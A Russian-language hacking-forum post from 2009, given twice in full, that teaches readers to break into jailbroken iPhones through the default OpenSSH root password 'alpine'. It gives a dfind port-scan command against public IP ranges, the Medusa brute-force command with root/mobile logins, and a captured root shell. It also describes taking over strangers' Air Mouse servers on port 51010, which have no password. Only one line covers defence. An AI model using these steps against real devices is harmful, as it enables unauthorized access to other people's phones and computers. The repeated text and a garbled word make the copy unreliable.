Xcontrol212
10.12.2009, 16:34
Предыстория
Недавно в IT-новостях появилась информация о уязвимости в Iphone/Ipod Touch,что при установлении из Cydia приложения OpenSSH есть уязвимость.Уязвимость в том,что стоит стандартный пароль alpine.
В статье я покажу как взломать Iphone через SSH,и как можно использовать root на Iphone.
Инструменты для взлома
1)Любой сканер портов,я предпочитаю dfind.(Скачать (http://forum.antichat.ru/thread93773-dfind.html)
2)Windows-Дедик с мощным каналом
3)Хостинг с SSH(для брута через SSH)
Взламываем
Первый шаг
Ставим на Windows-дедик dfind,для удобвства создаем bat'ник со следующим содержанием:
dfind.exe -p 22 73.43.54.12 73.255.255.255
Запускаем сканер,ждем когда же будут результаты:
http://i029.radikal.ru/0912/20/6545c61eec2b.jpg
В dfind сохраняет результаты в txt-файле dfind.txt
Ждать надо примерно часа два-три,чтобы побольше набралось IP-адресов с открытым 22 портом.
Лучше всего сканить Ip-адреса USA,т.к. компания Apple,американская фирма.
Второй шаг
Качаем SSH-клиент,например Putty( http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html )
Заходим на свой SSH-акк,и ставим брутфорс Medusa.
Настройка Medusa (http://forum.antichat.ru/thread157036.html)
Закачиваем на сервак три файла на сервак:
hosts.txt,login.txt,password.txt
В hosts.txt добавляем айпи насканеные нами в виде:
87.123.51.79
27.123.52.113
27.123.52.140
27.123.52.184
27.123.54.33
27.123.58.139
27.123.61.139
27.123.62.62
87.123.62.155
в login.txt добавляем лишь два логина:
root
mobile
В password.txt только пароль alpine
Закачиваем на сервак:
wget http://site.com/hosts.txt
wget http://site.com/password.txt
wget http://site.com/login.txt
Дальше выполняем следующую команду:
medusa -T 3 -H hosts.txt -U login.txt -P password.txt -O good.txt -M ssh
http://s42.radikal.ru/i096/0912/74/526f2876b060.jpg
Ждемс результата брута!
Смотрем good.txt
Через несколько минут у меня уже был 1 сбрученный ssh-акк к Iphone.
Подконнектился через putty и вот я удаленно подсоединился к Iphone:
login as: root
root@*******'s password:
iPhone-blackas:~ root#
Защита от SSH
Через программу BossPrefs,вырубаешь SSH
http://s58.radikal.ru/i161/0911/ee/8762ab6fff21.png
А так если вам не нужен OpenSSH,то вообще не закачивается его!
Authorization bypas в Air Mouse
Authorization bypass
Уязвимость подобия той,когда нашли в jailbreak'нутом Iphone/Ipod Touch в службе SSH!
После установки сервера на Windows 7,я запустил Air Mouse.exe и я увидел следующее:
http://s53.radikal.ru/i141/0912/68/7828937f60f5.png
Порт по дефолту:51010
Пароль по дефолту не стоит!
Так мы сможем получить доступ к чужой мышке,надо иметь Iphone/Ipod Touch,сканер портов на порт 51010
Сканим и подключаемся,и будет иметь доступ к чужой мышке.
Вот такая уязвимость,получили доступ к чужой мrol21ышке!:)
(С)Xcontrol212
Недавно в IT-новостях появилась информация о уязвимости в Iphone/Ipod Touch,что при установлении из Cydia приложения OpenSSH есть уязвимость.Уязвимость в том,что стоит стандартный пароль alpine.
В статье я покажу как взломать Iphone через SSH,и как можно использовать root на Iphone.
Инструменты для взлома
1)Любой сканер портов,я предпочитаю dfind.(Скачать (http://forum.antichat.ru/thread93773-dfind.html)
2)Windows-Дедик с мощным каналом
3)Хостинг с SSH(для брута через SSH)
Взламываем
Первый шаг
Ставим на Windows-дедик dfind,для удобвства создаем bat'ник со следующим содержанием:
dfind.exe -p 22 73.43.54.12 73.255.255.255
Запускаем сканер,ждем когда же будут результаты:
http://i029.radikal.ru/0912/20/6545c61eec2b.jpg
В dfind сохраняет результаты в txt-файле dfind.txt
Ждать надо примерно часа два-три,чтобы побольше набралось IP-адресов с открытым 22 портом.
Лучше всего сканить Ip-адреса USA,т.к. компания Apple,американская фирма.
Второй шаг
Качаем SSH-клиент,например Putty( http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html )
Заходим на свой SSH-акк,и ставим брутфорс Medusa.
Настройка Medusa (http://forum.antichat.ru/thread157036.html)
Закачиваем на сервак три файла на сервак:
hosts.txt,login.txt,password.txt
В hosts.txt добавляем айпи насканеные нами в виде:
87.123.51.79
27.123.52.113
27.123.52.140
27.123.52.184
27.123.54.33
27.123.58.139
27.123.61.139
27.123.62.62
87.123.62.155
в login.txt добавляем лишь два логина:
root
mobile
В password.txt только пароль alpine
Закачиваем на сервак:
wget http://site.com/hosts.txt
wget http://site.com/password.txt
wget http://site.com/login.txt
Дальше выполняем следующую команду:
medusa -T 3 -H hosts.txt -U login.txt -P password.txt -O good.txt -M ssh
http://s42.radikal.ru/i096/0912/74/526f2876b060.jpg
Ждемс результата брута!
Смотрем good.txt
Через несколько минут у меня уже был 1 сбрученный ssh-акк к Iphone.
Подконнектился через putty и вот я удаленно подсоединился к Iphone:
login as: root
root@*******'s password:
iPhone-blackas:~ root#
Защита от SSH
Через программу BossPrefs,вырубаешь SSH
http://s58.radikal.ru/i161/0911/ee/8762ab6fff21.png
А так если вам не нужен OpenSSH,то вообще не закачивается его!
Authorization bypas в Air Mouse
Authorization bypass
Уязвимость подобия той,когда нашли в jailbreak'нутом Iphone/Ipod Touch в службе SSH!
После установки сервера на Windows 7,я запустил Air Mouse.exe и я увидел следующее:
http://s53.radikal.ru/i141/0912/68/7828937f60f5.png
Порт по дефолту:51010
Пароль по дефолту не стоит!
Так мы сможем получить доступ к чужой мышке,надо иметь Iphone/Ipod Touch,сканер портов на порт 51010
Сканим и подключаемся,и будет иметь доступ к чужой мышке.
Вот такая уязвимость,получили доступ к чужой мrol21ышке!:)
(С)Xcontrol212